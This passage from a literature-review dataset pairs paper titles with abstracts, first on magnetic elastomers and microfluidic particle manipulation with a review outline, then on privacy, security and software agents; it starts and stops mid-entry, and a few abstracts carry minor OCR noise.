mounted on a micromanipulator was approached to the sample (Figure SI-4) and the response of the micropillars was followed by optical microscopy. Micropillars bended and rotated about their own axes when the magnet approached the sample and was moved around it (Figure 2A, SI-movie 1). The movement was homogeneous across the pattern (SI-movie 2). At stronger field gradients, a more pronounced bending and contact between pillars (Figure 2B1, SI-movie 3) or contact between the upper part of the pillar and the backing layer of the array (Figure 2B2, SI-movie 4 and 5) was observed depending on the bending direction of the pillars. When the magnet was removed, the pillars returned to --- paper_title: Application of magnetorheological elastomer to vibration absorber paper_content: Abstract Traditional dynamic vibration absorber (DVA) is widely used in industries as a vibration absorption equipment. However, it is only effective at narrow working frequency range. This shortcoming has limited its stability and application. This paper develops an adaptive tuned vibration absorber (ATVA) based on unique characteristics of magnetorheological elastomers (MREs), whose modulus can be controlled by an applied magnetic field. This ATVA works in shear mode and consists of dynamic mass, static mass and smart spring elements with MREs. Based on the double pole model of MR effects, the shift-frequency capability of the ATVA has been theoretically and experimentally evaluated. The experimental results demonstrated that the natural frequency of the ATVA can be tuned from 27.5 Hz to 40 Hz. To study its vibration absorption capacity, a beam structure with two ends supported has been employed. To analyze the vibration absorption capacity, a dynamic model of coupling beam and absorber has been established. Both the calculation and experimental results show that the absorption capacity of the developed ATVA is better than the traditional TVA and can achieve as high as 25 dB which was justified by the experiment. --- paper_title: Magnetic field sensitive functional elastomers with tuneable elastic modulus paper_content: The main purpose of the present work was to establish the effect of external magnetic field on the elastic modulus. We have prepared poly(dimethyl siloxane) networks loaded with randomly distributed carbonyl iron particles. It was found, that the elastic modulus of magnetoelasts could be increased by uniform magnetic field. In order to enhance the magnetic reinforcement effect, we have prepared anisotropic samples under uniform magnetic field. This procedure results in formation of chain-like structures from the carbonyl iron particles aligned parallel to the field direction. The effect of particle concentration, the intensity of uniform magnetic field as well as the spatial distribution of particles on the magnetic field induced excess modulus were studied. It was established that the uniaxial field structured composites exhibit larger excess modulus compared to the random particle dispersions. The most significant effect was found if the applied field is parallel to the particle alignment and to the mechanical stress. A phenomenological approach was proposed to describe the dependence of elastic modulus on the magnetic induction. The magnetic field sensitive soft materials with tuneable elastic properties may find usage in elastomer bearings and vibration absorber. --- paper_title: Shear properties of a magnetorheological elastomer paper_content: This paper presents an experiment testing the damped free vibration of a system composed of a magnetorheological elastomer and a mass. The goal of this experiment was to obtain the dependence of the natural frequency and the damping ratio of the structure on the applied magnetic field. The shear properties, including the shear storage modulus and the damping factor, were therefore determined. The experimental results revealed that the shear storage modulus could reach a value of 60% of the zero-field modulus and was dominated by the magnetic field, but the change in the damping factor could be neglected. Furthermore, when the field was moderate and saturation did not occur, the shear storage modulus increased proportionally with the applied field. This interesting phenomenon was analysed, and it is suggested that the subquadratic field dependence, which arises from the saturation of the magnetization near the poles of closely spaced pairs of spheres, must be taken into consideration. --- paper_title: Study of fluid damping effects on resonant frequency of an electromagnetically actuated valveless micropump. paper_content: As fluid flow effects on the actuation and dynamic response of a vibrating membrane are crucial to micropump design in drug delivery, this paper presents both a mathematical and finite-element analysis (FEA) validation of a solution to fluid damping of a valveless micropump model. To further understand the behavior of the micropump, effects of geometrical dimensions and properties of fluid on the resonant frequency are analyzed to optimize the design of the proposed micropump. The analytical and numerical solutions show that the resonant frequency decreases with the slenderness ratio of the diffuser and increases with the opening angle, high aspect ratio, and thickness ratio between the membrane and the fluid chamber depth. A specific valveless micropump model with a 6-mm diameter and 65-μm thickness polydimethylsiloxane (PDMS) composite elastic membrane was studied and analyzed when subjected to different fluids conditions. The resonant frequency of a clamped circular membrane is found to be 138.11 Hz, neglecting the fluid. For a gas fluid load, the frequency is attenuated by slightly shifting to 104.76 Hz and it is significantly reduced to 5.53 Hz when the liquid fluid is loaded. Resonant frequency remarkably shifts the flow rate of the pump; hence, frequency-dependent characteristics of both single-chamber and dual-chamber configuration micropumps were investigated. It was observed that, although the fluid capacity is doubled for the latter, the maximum flow rate was found to be around 27.73 μl/min under 0.4-A input current with an excitation frequency of 3 Hz. This is less than twice the flow rate of a single chamber of 19.61 μl/min tested under the same current but with an excitation frequency of 4.36 Hz. The proposed double-chamber model analytical solution combined with the optimization of the nozzle/diffuser design and assuming the effects of damping proved to be an effective tool in predicting micropump performance and flow rate delivery. --- paper_title: Design parameters for magneto-elastic soft actuators paper_content: Novel soft actuators can be designed from ferrogels by combining the elastic behavior of a polymer matrix with the magnetic properties of a magnetic filler. A thorough understanding of the mechanical behavior of ferrogel actuation is essential for optimizing actuator performance. For actuation by linear magnetostriction, the influence of geometrical parameters on the onset and magnitude of hysteretic loss, the range for the continuous deformation ratio, the rate of change of the deformation ratio with respect to the field strength, and the saturation elongation were modeled. These results demonstrate that geometrical design parameters such as specimen length, aspect ratio, and distance from the magnetic field source can be used to tune the performance of ferrogels. --- paper_title: Analysis and fabrication of patterned magnetorheological elastomers paper_content: This paper presents analysis, fabrication and characterization of patterned magnetorheological (MR) elastomers. By taking into account the local magnetic field in MREs and particle interaction magnetic energy, the magnetic-field-dependent mechanical properties of MREs with lattice and BCC structures were theoretically analyzed and numerically simulated. Soft magnetic particles were assembled in a polydimethylsiloxane (PDMS) matrix to fabricate new MR elastomers with uniform lattice and BCC structures, which were observed by a microscope. The field-dependent moduli of the new MR elastomers were characterized by using a parallel-plate MR rheometer. The experimental results agreed well with numerical simulations. --- paper_title: An integrated micro-chip for rapid detection of magnetic particles paper_content: This paper proposes an integrated micro-chip for the manipulation and detection of magnetic particles (MPs). A conducting ring structure is used to manipulate MPs toward giant magnetoresistance (GMR) sensing elements for rapid detection. The GMR sensor is fabricated in a horseshoe shape in order to detect the majority of MPs that are trapped around the conducting structure. The GMR sensing elements are connected in a Wheatstone bridge circuit topology for optimum noise suppression. Full fabrication details of the micro-chip, characterization of the GMR sensors, and experimental results with MPs are presented in this paper. Experimental results showed that the micro-chip can detect MPs from low concentration samples after they were guided toward the GMR sensors by applying current to the conducting ring structure. --- paper_title: Enhanced separation of magnetic and diamagnetic particles in a dilute ferrofluid paper_content: Traditional magnetic field-induced particle separations take place in water-based diamagnetic solutions, where magnetic particles are captured while diamagnetic particles flow through without being affected by the magnetic field. We demonstrate that replacing the diamagnetic aqueous medium with a dilute ferrofluid can significantly increase the throughput of magnetic and diamagnetic particle separation. This enhancement is attributed to the simultaneous positive and negative magnetophoresis of magnetic and diamagnetic particles, respectively, in a ferrofluid. The particle transport behaviors in both ferrofluid- and water-based separations are predicted using an analytical model. --- paper_title: Biosensing utilizing the motion of magnetic microparticles in a microfluidic system paper_content: Abstract The study for the design of a compact and inexpensive biosensing device, which can be operated either by primary care personnel or by patients as opposed to skilled operators, is presented. The main parts of the proposed device are a microfluidic channel, permanent magnets and functionalized magnetic microparticles. The innovative aspect of the proposed biosensing method is that it utilizes the volumetric increase of magnetic microparticles when analyte binds to their surface. Their velocity decreases drastically when they are accelerated by an externally applied magnetic force within a microfluidic channel. This effect is utilized to detect the presence of analyte e.g. microbes. Analytical calculations showed that a decrease in velocity of approximately 23% can be achieved due to the volumetric change of a magnetic microparticle of 1 μ m diameter when HIV virions of approximately 0 , 135 μ m are bound to its surface and by keeping its magnetic properties the same. Preliminary experiments were carried out utilizing superparamagnetic microparticles coated with streptavidin and polystyrene microparticles coated with biotin. --- paper_title: Cell manipulation with magnetic particles toward microfluidic cytometry paper_content: Magnetic particles have become a promising tool for nearly all major lab-on-a-chip (LOC) applications, from sample capturing, purification, enrichment, transport to detection. For biological applications, the use of magnetic particles is especially well established for immunomagnetic separation. There is a great amount of interest in the automation of cell sorting and counting with magnetic particles in LOC platforms. So far, despite great efforts, only few fully functional LOC devices have been described and further integration is necessary. In this review, we will describe the physics of magnetic cell sorting and counting in LOC formats with a special focus on recent progress in the field. --- paper_title: Microfluidic applications of functionalized magnetic particles for environmental analysis: focus on waterborne pathogen detection paper_content: The continuous surveillance of drinking water is extremely important to provide early warning of contamination and to ensure continuous supplies of healthy drinking water. Isolation and detection of a particular type of pathogen present at low concentration in a large volume of water, concentrating the analyte in a small detection volume, and removing detection inhibiting factors from the concentrated sample, present the three most important challenges for water quality monitoring laboratories. Combining advanced biological detection methods (e.g., nucleic acid-based or immunology-based protocols) with microfluidics and immunomagnetic separation techniques that exploit functionalized magnetic particles has tremendous potential for realization of an integrated system for pathogen detection, in particular, of waterborne pathogens. Taking advantage of the unique properties of magnetic particles, faster, more sensitive, and more economical diagnostic assays can be developed that can assist in the battle against microbial pathogenesis. In this review, we highlight current technologies and methods used for realization of magnetic particle-based microfluidic integrated waterborne pathogen isolation and detection systems, which have the potential to comply in future with regulatory water quality monitoring requirements. --- paper_title: Manipulation and sorting of magnetic particles by a magnetic force microscope on a microfluidic magnetic trap platform paper_content: We have integrated a microfluidic magnetic trap platform with an external magnetic force microscope (MFM) cantilever. The MFM cantilever tip serves as a magnetorobotic arm that provides a translatable local magnetic field gradient to capture and move magnetic particles with nanometer precision. The MFM electronics have been programmed to sort an initially random distribution of particles by moving them within an array of magnetic trapping elements. We measured the maximum velocity at which the particles can be translated to be 2.2mm∕s±0.1mm∕s, which can potentially permit a sorting rate of approximately 5500particles∕min. We determined a magnetic force of 35.3±2.0pN acting on a 1μm diameter particle by measuring the hydrodynamic drag force necessary to free the particle. Release of the particles from the MFM tip is made possible by a nitride membrane that separates the arm and magnetic trap elements from the particle solution. This platform has potential applications for magnetic-based sorting, manipulati... --- paper_title: Magnetophoresis of Nanoparticles paper_content: Iron oxide cores of 35 nm are coated with gold nanoparticles so that individual particle motion can be tracked in real time through the plasmonic response using dark field optical microscopy. Although Brownian and viscous drag forces are pronounced for nanoparticles, we show that magnetic manipulation is possible using large magnetic field gradients. The trajectories are analyzed to separate contributions from the different types of forces. With field gradients up to 3000 T/m, forces as small as 1.5 fN are detected. --- paper_title: Manipulation of magnetic particles by patterned arrays of magnetic spin-valve traps paper_content: Abstract A novel platform for microfluidic manipulation of magnetic particles is discussed. The particles are confined by an array of magnetic spin valves with bistable ferromagnetic “ON” and antiferromagnetic “OFF” net magnetization states. The switchable fringing fields near the spin-valve traps can be used to selectively confine or release particles for transport or sorting. Spin-valve traps may be potentially used as magnetic molecular tweezers or adapted to a low-power magnetic random access memory (MRAM) switching architecture for massively parallel particle sorting applications. --- paper_title: A model for predicting magnetic particle capture in a microfluidic bioseparator paper_content: A model is presented for predicting the capture of magnetic micro/nano-particles in a bioseparation microsystem. This bioseparator consists of an array of conductive elements embedded beneath a rectangular microfluidic channel. The magnetic particles are introduced into the microchannel in solution, and are attracted and held by the magnetic force produced by the energized elements. Analytical expressions are obtained for the dominant magnetic and fluidic forces on the particles as they move through the microchannel. These expressions are included in the equations of motion, which are solved numerically to predict particle trajectories and capture time. This model is well-suited for parametric analysis of particle capture taking into account variations in particle size, material properties, applied current, microchannel dimensions, fluid properties, and flow velocity. --- paper_title: Combined microfluidic-micromagnetic separation of living cells in continuous flow. paper_content: This paper describes a miniaturized, integrated, microfluidic device that can pull molecules and living cells bound to magnetic particles from one laminar flow path to an- other by applying a local magnetic field gradient, and thus se- lectively remove them from flowing biological fluids without any wash steps. To accomplish this, a microfabricated high- gradient magnetic field concentrator (HGMC) was integrated at one side of a microfluidic channel with two inlets and outlets. When magnetic micro- or nano-particles were intro- duced into one flow path, they remained limited to that flow stream. In contrast, when the HGMC was magnetized, the magnetic beads were efficiently pulled from the initial flow path into the collection stream, thereby cleansing the original fluid. Using this microdevice, living E. coli bacteria bound to magnetic nanoparticles were efficiently removed from flow- ing solutions containing densities of red blood cells similar to that found in blood. Because this microdevice allows large numbers of beads and cells to be sorted simultaneously, has no capacity limit, and does not lose separation efficiency as particles are removed, it may be especially useful for separations from blood or other clinical samples. This on- chip HGMC-microfluidic separator technology may poten- tially allow cell separations to be carried out in the field outside of hospitals and clinical laboratories. --- paper_title: Rare cell separation and analysis by magnetic sorting. paper_content: The separation and or isolation of rare cells using magnetic forces are commonly used and growing in use ranging from simple sample prep for further studies to a FDA approved, clinical diagnostic test. This growth is the result of both the demand to obtain homogeneous rare cells for molecular analysis and the dramatic increases in the power of permanent magnets that even allow the separation of some unlabeled cells based on intrinsic magnetic moments, such as malaria parasite-infected red blood cells. --- paper_title: On-chip bio-analyte detection utilizing the velocity of magnetic microparticles in a fluid paper_content: A biosensing principle utilizing the motion of suspended magnetic microparticles in a microfluidic system is presented. The system utilizes the innovative concept of the velocity dependence of magnetic microparticles (MPs) due to their volumetric change when analyte is attached to their surface via antibody–antigen binding. When the magnetic microparticles are attracted by a magnetic field within a microfluidic channel their velocity depends on the presence of analyte. Specifically, their velocity decreases drastically when the magnetic microparticles are covered by (nonmagnetic) analyte (LMPs) due to the increased drag force in the opposite direction to that of the magnetic force. Experiments were carried out as a proof of concept. A promising 52% decrease in the velocity of the LMPs in comparison to that of the MPs was measured when both of them were accelerated inside a microfluidic channel using an external permanent magnet. The presented biosensing methodology offers a compact and integrated solution... ---
Title: Applications of Micro/Nanoparticles in Microfluidic Sensors: A Review Section 1: Introduction Description 1: Introduce the concept of lab-on-a-chip (LOC) systems and discuss the role of microfluidics and nanofluidics, highlighting the importance of micro/nanoparticles. Section 2: Design and Fabrication of PDMS-Based Conducting Composites Description 2: Discuss the integration of conducting particles into PDMS to create conducting composites and their applications in microfluidic devices. Section 3: GERF Application in Microfluidics Description 3: Explain the use of Giant Electrorheological Fluid (GERF) in microfluidic applications such as actuators, valves, and logic control. Section 4: Particles' Electric Force in Microfluidic Channels Description 4: Describe the electric forces acting on particles in microfluidic channels, including electrophoretic and dielectrophoretic forces, and their applications. Section 5: Design and Fabrication of Magnetic PDMS Composites Description 5: Detail the fabrication of magnetic PDMS composites by incorporating magnetic nanoparticles and their applications in microfluidic devices. Section 6: Particles' Magnetic Force in Microfluidic Channels Description 6: Outline the manipulation of magnetic particles in microfluidic channels using external magnetic fields and their applications. Section 7: Conclusions Description 7: Summarize the key points discussed in the paper regarding the use of particles in microfluidic systems, their behaviors, and potential applications.
A survey of privacy in multi-agent systems
17
--- paper_title: A Taxonomy of Privacy paper_content: Privacy is a concept in disarray. Nobody can articulate what it means. As one commentator has observed, privacy suffers from an embarrassment of meanings. Privacy is far too vague a concept to guide adjudication and lawmaking, as abstract incantations of the importance of privacy do not fare well when pitted against more concretely-stated countervailing interests. In 1960, the famous torts scholar William Prosser attempted to make sense of the landscape of privacy law by identifying four different interests. But Prosser focused only on tort law, and the law of information privacy is significantly more vast and complex, extending to Fourth Amendment law, the constitutional right to information privacy, evidentiary privileges, dozens of federal privacy statutes, and hundreds of state statutes. Moreover, Prosser wrote over 40 years ago, and new technologies have given rise to a panoply of new privacy harms. A new taxonomy to understand privacy violations is thus sorely needed. This article develops a taxonomy to identify privacy problems in a comprehensive and concrete manner. It endeavors to guide the law toward a more coherent understanding of privacy and to serve as a framework for the future development of the field of privacy law. --- paper_title: Network Security Essentials: Applications and Standards paper_content: From the Book: ::: PREFACE: Preface In this age of electronic connectivity, of viruses and hackers, of electronic eavesdropping and electronic fraud, network security has assumed increasing importance. Two trends have come together to make the topic of this book of vital interest. First, the explosive growth in computer systems and their interconnections via networks has increased the dependence of both organizations and individuals on the information stored and communicated using these systems. This, in turn, has led to a heightened awareness of the need to protect data and resources from disclosure, to guarantee the authenticity of data and messages, and to protect systems from network-based attacks. Second, the disciplines of cryptography and network security have matured, leading to the development of practical, readily available applications to enforce network security. Objectives It is the purpose of this book to provide a practical survey of network security applications and standards. The emphasis is on applications that are widely used on the Internet and for corporate networks, and on standards, especially Internet standards, that have been widely deployed. Intended Audience The book is intended for both an academic and a professional audience. As a textbook, it is intended as a one-semester undergraduate course on network security for computer science, computer engineering, and electrical engineering majors. The book also serves as a basic reference volume and is suitable for self-study. Plan of the Book The book is organized in three parts: I. Cryptography: A concise survey of the cryptographic algorithms and protocols i reportunderlyingnetwork security applications, including encryption, hash functions, digital signatures, and key exchange. i See Appen~ II. Network Security Applications: Covers important network security tools and applications, including Kerberos, X.509v3 certificates, PGP, S/MIME, IP Secu- rity, SSL/TLS, SET, and SNMPv3. III. System Security: Looks at system-level security issues, including the threat of and countermeasures for intruders and viruses, and the use of firewalls and trusted systems. This book i A more detailed, chapter-by-chapter summary appears at the end of Chapter ~ (CNS2e). 1. In addition, the book includes an extensive glossary, a list of frequently used detailed an< acronyms, and a bibliography. There are also end-of-chapter problems and sugges- of which co tions for further reading. dards (NSE 3. NSE1e in covers SNh Internet Services for Instructors and Students There is a Web page for this book that provides support for students and instruc tors. The page includes links to relevant sites, transparency masters of figures in the book in PDF (Adobe Acrobat) format, and sign-up information for the book's Internet mailing list. The Web page is at ... --- paper_title: All your contacts are belong to us: automated identity theft attacks on social networks paper_content: Social networking sites have been increasingly gaining popularity. Well-known sites such as Facebook have been reporting growth rates as high as 3% per week. Many social networking sites have millions of registered users who use these sites to share photographs, contact long-lost friends, establish new business contacts and to keep in touch. In this paper, we investigate how easy it would be for a potential attacker to launch automated crawling and identity theft attacks against a number of popular social networking sites in order to gain access to a large volume of personal user information. The first attack we present is the automated identity theft of existing user profiles and sending of friend requests to the contacts of the cloned victim. The hope, from the attacker's point of view, is that the contacted users simply trust and accept the friend request. By establishing a friendship relationship with the contacts of a victim, the attacker is able to access the sensitive personal information provided by them. In the second, more advanced attack we present, we show that it is effective and feasible to launch an automated, cross-site profile cloning attack. In this attack, we are able to automatically create a forged profile in a network where the victim is not registered yet and contact the victim's friends who are registered on both networks. Our experimental results with real users show that the automated attacks we present are effective and feasible in practice. --- paper_title: Anonymous Communications for Mobile Agents paper_content: Anonymous communication techniques are vital for some types of e-commerce applications. There have been several different approaches developed for providing anonymous communication over the Internet. In this paper, we review key techniques for anonymous communication and describe an alternate anonymous networking approach based on agile agents intended to provide anonymous communication protection for mobile agent systems. --- paper_title: The Right to Privacy paper_content: hat the individual shall have full protection in person and in property is a principle as old as the common law; but it has been found necessary from time to time to define anew the exact nature and extent of such protection. Political, social, and economic changes entail the recognition of new rights, and the common law, in its eternal youth, grows to meet the new demands of society. Thus, in very early times, the law gave a remedy only for physical interference with life and property, for trespasses vi et armis. Then the "right to life" served only to protect the subject from battery in its various forms; liberty meant freedom from actual restraint; and the right to property secured to the individual his lands and his cattle. Later, there came a recognition of man's spiritual nature, of his feelings and his intellect. Gradually the scope of these legal rights broadened; and now the right to life has come to mean the right to enjoy life, -the right to be let alone; the right to liberty secures the exercise of extensive civil privileges; and the term "property" has grown to comprise every form of possession -intangible, as well as tangible. --- paper_title: Privacy and Artificial Agents, or, Is Google Reading My Email? paper_content: We investigate legal and philosophical notions of privacy in the context of artificial agents. Our analysis utilizes a normative account of privacy that defends its value and the extent to which it should be protected: privacy is treated as an interest with moral value, to supplement the legal claim that privacy is a legal right worthy of protection by society and the law. We argue that the fact that the only entity to access my personal data (such as email) is an artificial agent is irrelevant to whether a breach of privacy has occurred. What is relevant are the capacities of the agent: what the agent is both able and empowered to do with that information. We show how concepts of legal agency and attribution of knowledge gained by agents to their principals are crucial to understanding whether a violation of privacy has occurred when artificial agents access users' personal data. As natural language processing and semantic extraction used in artificial agents become increasingly sophisticated, so the corporations that deploy those agents will be more likely to be attributed with knowledge of their users' personal information, thus triggering significant potential legal liabilities. --- paper_title: A study of preferences for sharing and privacy paper_content: We describe studies of preferences about information sharing aimed at identifying fundamental concerns with privacy and at understanding how people might abstract the details of sharing into higher-level classes of recipients and information that are treated similarly. Thirty people specified what information they are willing to share with whom.. Although people vary in their overall level of comfort in sharing, we identified key classes of recipients and information. Such abstractions highlight the promise of developing expressive controls for sharing and privacy. --- paper_title: Unpacking "privacy" for a networked world paper_content: Although privacy is broadly recognized as a dominant concern for the development of novel interactive technologies, our ability to reason analytically about privacy in real settings is limited. A lack of conceptual interpretive frameworks makes it difficult to unpack interrelated privacy issues in settings where information technology is also present. Building on theory developed by social psychologist Irwin Altman, we outline a model of privacy as a dynamic, dialectic process. We discuss three tensions that govern interpersonal privacy management in everyday life, and use these to explore select technology case studies drawn from the research literature. These suggest new ways for thinking about privacy in socio-technical environments as a practical matter. --- paper_title: Advances in Artificial Intelligence for Privacy Protection and Security paper_content: In this book, we aim to collect the most recent advances in artificial intelligence techniques (i.e. neural networks, fuzzy systems, multi-agent systems, genetic algorithms, image analysis, clustering, etc), which are applied to the protection of privacy and security. The symbiosis between these fields leads to a pool of invigorating ideas, which are explored in this book. On the one hand, individual privacy protection is a hot topic and must be addressed in order to guarantee the proper evolution of a modern society. On the other, security can invade individual privacy, especially after the appearance of new forms of terrorism. In this book, we analyze these problems from a new point of view. --- paper_title: Privacy, economics, and price discrimination on the Internet paper_content: The rapid erosion of privacy poses numerous puzzles. Why is it occurring, and why do people care about it? This paper proposes an explanation for many of these puzzles in terms of the increasing importance of price discrimination. Privacy appears to be declining largely in order to facilitate difierential pricing, which ofiers greater social and economic gains than auctions or shopping agents. The thesis of this paper is that what really motivates commercial organizations (even though they often do not realize it clearly themselves) is the growing incentive to price discriminate, coupled with the increasing ability to price discriminate. It is the same incentive that has led to the airline yield management system, with a complex and constantly changing array of prices. It is also the same incentive that led railroads to invent a variety of price and quality difierentiation schemes in the 19th century. Privacy intrusions serve to provide the information that allows sellers to determine buyers' willingness to pay. They also allow monitoring of usage, to ensure that arbitrage is not used to bypass discriminatory pricing.Economically, price discrimination is usually regarded as desirable, since it often increases the efficiency of the economy. That is why it is frequently promoted by governments, either through explicit mandates or through indirect means. On the other hand, price discrimination often arouses strong opposition from the public.There is no easy resolution to the conflict between sellers; incentives to price discriminate and buyers' resistance to such measures. The continuing tension between these two factors will have important consequences for the nature of the economy. It will also determine which technologies will be adopted widely. Governments will likely play an increasing role in controlling pricing, although their roles will continue to be ambiguous. Sellers are likely to rely to an even greater extent on techniques such as bundling that will allow them to extract more consumer surplus and also to conceal the extent of price discrimination. Micropayments and auctions are likely to play a smaller role than is often expected. In general, because of strong conflicting pressures, privacy is likely to prove an intractable problem that will be prominent on the the public agenda for the foreseeable future. --- paper_title: Electronic Agents and Privacy: A Cyberspace Odyssey 2001 paper_content: In this paper, analysis is carried out of the impact of the use of electronic agents on privacy and related interests. A preliminary examination is made of the various risks to privacy occasioned by agent operations and of the way in which current data protection rules can mitigate these risks. It is suggested that greater thought be given to drafting data protection rules that take full account of electronic agents. 1. Visions of agents Gareth Morgan has persuasively shown that we tend to view and understand organisations using various metaphorical images that often work at a subconscious, intuitive level. The same point can be made with respect to electronic agents. Concomitantly, how we perceive the impact of electronic agents on privacy will tend to be shaped in part by certain visions of what electronic agents are and are capable of becoming. As Morgan correctly shows in relation to organisations, such visions are not just interpretive constructs; they also provide frameworks for policy and action, including law making. Thus, when analysing the interrelationship of electronic agents and privacy, we must not lose sight of the influence of these images. Of the various visions of electronic agents which appear to dominate public discourse, two deserve to be singled out for special attention in light of the theme of this paper. The first vision is that of the electronic agent as ‘digital secretary’ and/or ‘digital butler’. This image depicts the agent as subservient and beneficent in relation to its users and indeed wider society. One of the 1 B.A.(Hons.), LL.B.(Hons.) (Australian National University); Dr. Juris / LL.D. (Oslo); Senior Research Fellow at the Norwegian Research Centre for Computers and Law, University of Oslo; Barrister of the Supreme Court of New South Wales. Thanks go to Graham Greenleaf for helpful comments on an earlier draft of this paper. This paper has been written in the framework of the ECLIP II project (Electronic Commerce Legal Issues Platform) funded by the European Commission under the specific programme for research, technological development and demonstration on a user-friendly information society (the IST programme). This paper, though, is solely the responsibility of the author and does not represent the opinion of the other contributors to ECLIP or of the European Community, nor is the European Community responsible for any use that might be made of data appearing in this paper. General information on ECLIP is available at http://www.eclip.org/. 2 Morgan, Images of Organization (Sage: London 1986). Morgan identifies a range of such images: e.g. organisations as machines, organisms, brains, cultures, political systems, pyschic prisons, processes of flux and transformation, and instruments of domination. 3 By ‘electronic agent’ is meant a software application which, with some degree of autonomy, mobility and learning capacity, executes specific tasks for a computer user or computer system. See further the paper by Weitzenboeck in this volume. Cf. commentary infra n. 9. --- paper_title: Engineering Privacy paper_content: In this paper we integrate insights from diverse islands of research on electronic privacy to offer a holistic view of privacy engineering and a systematic structure for the discipline's topics. First we discuss privacy requirements grounded in both historic and contemporary perspectives on privacy. We use a three-layer model of user privacy concerns to relate them to system operations (data transfer, storage and processing) and examine their effects on user behavior. In the second part of the paper we develop guidelines for building privacy-friendly systems. We distinguish two approaches: "privacy-by-policy" and "privacy-by-architecture." The privacy-by-policy approach focuses on the implementation of the notice and choice principles of fair information practices (FIPs), while the privacy-by-architecture approach minimizes the collection of identifiable personal data and emphasizes anonymization and client-side data storage and processing. We discuss both approaches with a view to their technical overlaps and boundaries as well as to economic feasibility. The paper aims to introduce engineers and computer scientists to the privacy research domain and provide concrete guidance on how to design privacy-friendly systems. --- paper_title: Agent Technology for e-Commerce paper_content: List of Figures. List of Tables. Preface. 1 Introduction. 1.1 A paradigm shift. 1.2 Electronic commerce. 1.3 Agents and e-commerce. 1.4 Further reading. 1.5 Exercises and topics for discussion. 2 Software agents. 2.1 Characteristics of agents. 2.2 Agents as intentional systems. 2.3 Making decisions. 2.4 Planning. 2.5 Learning. 2.6 Agent architectures. 2.7 Agents in perspective. 2.8 Methodologies and languages. 2.9 Further reading. 2.10 Exercises and topics for discussion. 3 Multi-agent systems. 3.1 Characteristics of multi-agent systems. 3.2 Interaction. 3.3 Agent communication. 3.4 Ontologies. 3.5 Cooperative problem solving. 3.6 Virtual organisations as multi-agent systems. 3.7 Infrastructure requirements for open multi-agent systems. 3.8 Further reading. 3.9 Exercises and topics for discussion. 4 Shopping Agents. 4.1 Consumer buying behaviour model. 4.2 Comparison shopping. 4.3 Working for the user. 4.4 How shopping agents work. 4.5 Limitations and issues. 4.6 Further reading. 4.7 Exercises and topics for discussion. 5 Middle agents. 5.1 Matching. 5.2 Classification of middle agents. 5.3 Describing capabilities. 5.4 LARKS. 5.5 OWL-S. 5.6 Further reading. 5.7 Exercises and topics for discussion. 6 Recommender systems. 6.1 Information needed. 6.2 Providing recommendations. 6.3 Recommendation technologies. 6.4 Content-based filtering. 6.5 Collaborative filtering. 6.6 Combining content and collaborative filtering. 6.7 Recommender systems in e-commerce. 6.8 A note on personalization. 6.9 Further reading. 6.10 Exercises and topics for discussion. 7 Elements of strategic interaction. 7.1 Elements of Economics. 7.2 Elements of Game Theory. 7.3 Further reading. 7.4 Exercises and topics for discussion. 8 Negotiation I. 8.1 Negotiation protocols. 8.2 Desired properties of negotiation protocols. 8.3 Abstract architecture for negotiating agents. 8.4 Auctions. 8.5 Classification of auctions. 8.6 Basic auction formats. 8.7 Double auctions. 8.8 Multi-attribute auctions. 8.9 Combinatorial auctions. 8.10 Auction platforms. 8.11 Issues in practical auction design. 8.12 Further reading. 8.13 Exercises and topics for discussion. 9 Negotiation II. 9.1 Bargaining. 9.2 Negotiation in different domains. 9.3 Coalitions. 9.4 Applications of coalition formation. 9.5 Social choice problems. 9.6 Argumentation. 9.7 Further reading. 9.8 Exercises and topics for discussion. 10 Mechanism design. 10.1 The mechanism design problem. 10.2 Dominant strategy implementation. 10.3 The Gibbard-Satterthwaite Impossibility Theorem. 10.4 The Groves-Clarke mechanisms. 10.5 Mechanism design and computational issues. 10.6 Further reading. 10.7 Exercises and topics for discussion. 11 Mobile agents. 11.1 Introducing mobility. 11.2 Facilitating mobility. 11.3 Mobile agent systems. 11.4 Aglets. 11.5 Mobile agent security. 11.6 Issues on mobile agents. 11.7 Further reading. 11.8 Exercises and topics for discussion. 12 Trust, security and legal issues. 12.1 Perceived risks. 12.2 Trust. 12.3 Trust in e-commerce. 12.4 Electronic institutions. 12.5 Reputation systems. 12.6 Security. 12.7 Cryptography. 12.8 Privacy, anonymity and agents. 12.9 Agents and the law. 12.10 Agents as legal persons. 12.11 Closing remarks. 12.12 Further reading. 12.13 Exercises and topics for discussion. A Introduction to decision theory. A.2 Making decisions. A.3 Utilities. A.4 Further reading. Bibliography. Index. --- paper_title: Information privacy: measuring individuals' concerns about organizational practices paper_content: Information privacy has been called one of the most important ethical issues of the informa1 Alien Lee was the accepting senior for this paper. tion age. Public opinion polls show rising levels of concer about privacy among Americans. Against this backdrop, research into issues associated with information privacy is increasing. Based on a number of preliminary studies, it has become apparent that organizational practices, individuals' perceptions of these practices, and societal responses are inextricably linked in many ways. Theories regarding these relationships are slowly emerging. Unfortunately, researchers attempting to examine such relationships through confirmatory empirical approaches may be impeded by the lack of validated instruments for measuring individuals' concerns about organizational information privacy practices. To enable future studies in the information privacy research stream, we developed and validated an instrument that identifies and measures the primary dimensions of individuals' concers about organizational information privacy practices. The development process included examinations of privacy literature; experience surveys and focus groups; and the use of expert judges. The result was a parsimonious 15-item instrument with four subscales tapping into dimensions of individuals' concerns about organizational information privacy practices. The instrument was rigorously tested and validated across several heterogenous populations, providing a high degree of confidence in the scales' validity, reliability, and generalizability. --- paper_title: Privacy in e-commerce: examining user scenarios and privacy preferences paper_content: Privacy is a necessary concern in electronic commerce. It is difficult, if not impossible, to complete a transaction without revealing some personal data ‐ a shipping address, billing information, or product preference. Users may be unwilling to provide this necessary information or even to browse online if they believe their privacy is invaded or threatened. Fortunately, there are technologies to help users protect their privacy. P3P (Platform for Privacy Preferences Project) from the World Wide Web Consortium is one such technology. However, there is a need to know more about the range of user concerns and preferences about privacy in order to build usable and effective interface mechanisms for P3P and other privacy technologies. Accordingly, we conducted a survey of 381 U.S. Net users, detailing a range of commerce scenarios and examining the participants' concerns and preferences about privacy. This paper presents both the findings from that study as well as their design implications. --- paper_title: Engineering Privacy paper_content: In this paper we integrate insights from diverse islands of research on electronic privacy to offer a holistic view of privacy engineering and a systematic structure for the discipline's topics. First we discuss privacy requirements grounded in both historic and contemporary perspectives on privacy. We use a three-layer model of user privacy concerns to relate them to system operations (data transfer, storage and processing) and examine their effects on user behavior. In the second part of the paper we develop guidelines for building privacy-friendly systems. We distinguish two approaches: "privacy-by-policy" and "privacy-by-architecture." The privacy-by-policy approach focuses on 